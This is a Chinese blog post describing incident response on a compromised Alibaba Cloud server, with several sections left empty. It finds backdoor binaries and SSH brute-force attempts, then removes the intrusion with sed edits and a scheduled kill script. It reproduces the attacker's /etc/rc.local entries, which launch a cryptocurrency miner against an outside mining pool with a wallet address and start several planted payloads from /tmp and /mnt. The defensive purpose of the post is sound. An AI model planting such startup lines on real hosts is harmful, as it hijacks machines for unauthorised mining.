解决阿里云主机收到攻击的问题

简介:

攻击类型:

主要是后门和肉鸡行为



 

先解决后门的问题:

步骤

(1)搞清楚后门文件的来历(是如何产生的)

(2)删除后门文件

具体做法:

使用定时器 定期删除后门文件

待删除的文件列表:

(a)/usr/bin/acpid

(b)/usr/bin/bsd-port/agent

定时器要执行的脚本:

 

定时器:

 

如何解决肉鸡行为呢?

查看/var/log/secure ,看到确实被多次尝试登陆

Java代码   收藏代码
  1. [root@iZ25tti3rxdZ log]# cat secure| grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq  
  2. apache from 121.42.0.30  
  3. ftp from 121.42.0.30  
  4. invalid user admin  
  5. invalid user test  
  6. invalid user user  
  7. mail from 121.42.0.30  
  8. root from 121.42.0.30  

 

发现可疑进程:

 

 

如何提高安全性?

我觉得应该有一个机制:

当主机被大量尝试登录时应该增加提醒,比如发邮件或者发短信

 

 查看root的home目录下的.bash_history

终于发现了猫腻:

 

同时还修改我系统核心文件/etc/rc.local

 于是查看/etc/rc.local 的修改记录:

[root@iZ25tti3rxdZ ~]# stat /etc/rc.local

  File: `/etc/rc.local'

  Size: 390       Blocks: 8          IO Block: 4096   regular file

Device: ca01h/51713dInode: 787612      Links: 1

Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)

Access: 2016-01-10 16:34:59.807094407 +0800

Modify: 2015-12-07 11:23:07.160211728 +0800

Change: 2015-12-07 11:23:07.160211728 +0800

 

 说明在2015-12-07 11:23:07被人恶意修改过

再看看修改成啥样了:

#!/bin/sh

#

# This script will be executed *after* all the other init scripts.

# You can put your own initialization stuff in here if you don't

# want to do the full Sys V style init stuff.

 

touch /var/lock/subsys/local

/tmp/minerd -a scrypt  -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk

/mnt/linsx

/mnt/linsx

/mnt/linsx

/mnt/linsx

/tmp/linex

/tmp/linex

/tmp/2897

/tmp/2897

~                           

 

 

正常的:

 

解决方法:

sed -i 's/^\(.*scrypt\)/# \1/' /etc/rc.local

sed -i 's/^\(.*\/mnt\/linsx\)/# \1/' /etc/rc.local

sed -i 's/^\(.*\/tmp\/\)/# \1/' /etc/rc.local

 

 异常进程:

[root@iZ25tti3rxdZ ~]# ps -ef |grep "/usr/bin/acpid" |grep -v grep

root     16790     1  0 16:48 ?        00:00:00 /usr/bin/acpid

root     16804 16790  0 16:48 ?        00:00:00 /usr/bin/acpid

root     16805 16804  0 16:48 ?        00:00:00 /usr/bin/acpid

如何杀*死异常进程:

Shell代码   收藏代码
  1. ps -ef |grep "/usr/bin/acpid" |grep -v grep |awk -F" "  {'print $2'}|xargs -i kill -9 {}  
  2. ps -ef |grep "/usr/bin/bsd-port/agent" |grep -v grep |awk -F" "  {'print $2'}|xargs -i kill -9 {}  

 

上述代码是在定时器中执行的,每10分钟执行一次 

相关文章
|
2月前
|
弹性计算 数据安全/隐私保护
【玩转雾锁王国/Enshrouded】2024年雾锁王国/Enshrouded阿里云主机搭建教程
随着游戏行业的不断发展,玩家们对于游戏体验的要求也越来越高。为了满足玩家们的需求,阿里云提供了游戏联机服务器一键部署方案,本文将为大家分享基于阿里云服务器10秒钟完成雾锁王国游戏服务器搭建教程,让大家的游戏体验更加顺畅。
157 1
|
2月前
|
弹性计算 调度 云计算
阿里云服务器多少钱?2024年阿里云主机价格配置表分享
在云计算的时代,阿里云作为国内领先的云服务提供商,其产品线丰富,满足了从个人到企业用户的各种需求。但对于很多初次接触云服务的用户来说,如何选择合适自己的云服务器以及对应的价格是多少,都是一个大问题。今天,我们就来为大家详细解读阿里云服务器的价格与配置,帮助你更好地选择。
|
6月前
|
运维 安全 Cloud Native
阿里云云安全中心介绍_态势感知_主机安全_漏洞扫描
阿里云云安全中心介绍_态势感知_主机安全_漏洞扫描,阿里云云安全中心(原态势感知)是一个实时识别、分析、预警安全威胁的服务器主机安全管理系统,云安全中心功能支持漏洞扫描与修复、基线检查、防勒索、防病毒、防篡改、威胁检测模型等功能,云安全中心基础版免费、防病毒班432元一年、高级版优惠价969元一年,还有企业版和旗舰版可选
195 0
|
2月前
|
弹性计算 Ubuntu Windows
2024年部署幻兽帕鲁/Palworld服务器多少钱?阿里云帕鲁主机优惠价格解析
对于热爱《幻兽帕鲁》的玩家们来说,一个稳定、高效的游戏服务器是畅享游戏乐趣的关键。那么,搭建一个这样的服务器需要多少钱呢?别担心,阿里云已经为大家准备了超值的幻兽帕鲁Palworld游戏服务器!
|
2月前
|
弹性计算 Ubuntu Linux
2024年如何在阿里云主机实现一键部署【幻兽帕鲁/Palworld】游戏?
《幻兽帕鲁》是最近非常火爆的一款游戏,由 Pocketpair 开发,是一款开放世界生存制作游戏,游戏于 2024 年 1 月 18 日发行抢先体验版本。游戏中,玩家可以在广阔的世界中收集神奇的生物 " 帕鲁 ",派他们进行战斗、建造、做农活,工业生产等。本文将详细介绍如何在阿里云服务器实现一键部署幻兽帕鲁联机服务器,帮助大家快速搭建自己的游戏联机服务器。
|
2月前
|
弹性计算 Ubuntu Linux
2024年阿里云一键搭建幻兽帕鲁游戏主机教程
火爆的《幻兽帕鲁》游戏让无数玩家着迷不已!那么,您是否急切想要拥有一个能与伙伴们一起畅快玩耍的游戏服务器呢?现在就跟随若城的脚步,一起动手搭建一个属于自己的《幻兽帕鲁》服务器吧!
|
1月前
|
弹性计算 Linux 数据中心
2024年阿里云香港服务器租用价格表_香港云主机优惠活动
2024年阿里云香港服务器租用价格表_香港云主机优惠活动,阿里云香港服务器2核1G、30M带宽、40GB ESSD系统盘优惠价格24元/月,288元一年,每月流量1024GB,多配置可选,阿里云百科整理分享阿里云香港服务器优惠活动、详细配置价格表和购买条件
|
2月前
|
弹性计算 Ubuntu 固态存储
2024年阿里云幻兽帕鲁服务器租用多少钱:阿里云Palworld/幻兽帕鲁主机优惠价格表整理
对于热爱幻兽帕鲁Palworld的玩家们来说,拥有一个稳定且性能出众的游戏服务器至关重要。阿里云,作为国内领先的云服务提供商,为广大玩家带来了极具性价比的幻兽帕鲁游戏服务器租用方案。
|
2月前
|
弹性计算 Ubuntu Linux
阿里云《幻兽帕鲁/Palworld》主机搭建不求人:2024年最新详细教程,轻松实现游戏世界搭建!
2024年阿里云自建【幻兽帕鲁/Palworld】主机详细教程。你是否还在为幻兽帕鲁联机而感到烦恼,因联机延迟高卡顿等问题而气馁。前一段时间写过一篇也是关于幻兽帕鲁服务器搭建的方法,不少小伙伴反映步骤太过于复杂,这就出一篇简便容易上手的幻兽帕鲁服务器搭建,轻轻松松的搞定与好友的联机!
186 3
|
2月前
|
弹性计算 数据安全/隐私保护
【雾锁王国/Enshrouded】 2024年阿里云主机搭建雾锁王国/Enshrouded私服教程
2024年阿里云服务器搭建雾锁王国/Enshrouded私服教程。随着游戏行业的不断发展,玩家们对于游戏体验的要求也越来越高。为了满足玩家们的需求,阿里云提供了游戏联机服务器一键部署方案,本文将为大家分享基于阿里云服务器10秒钟完成雾锁王国游戏服务器搭建教程,让大家的游戏体验更加顺畅。
230 0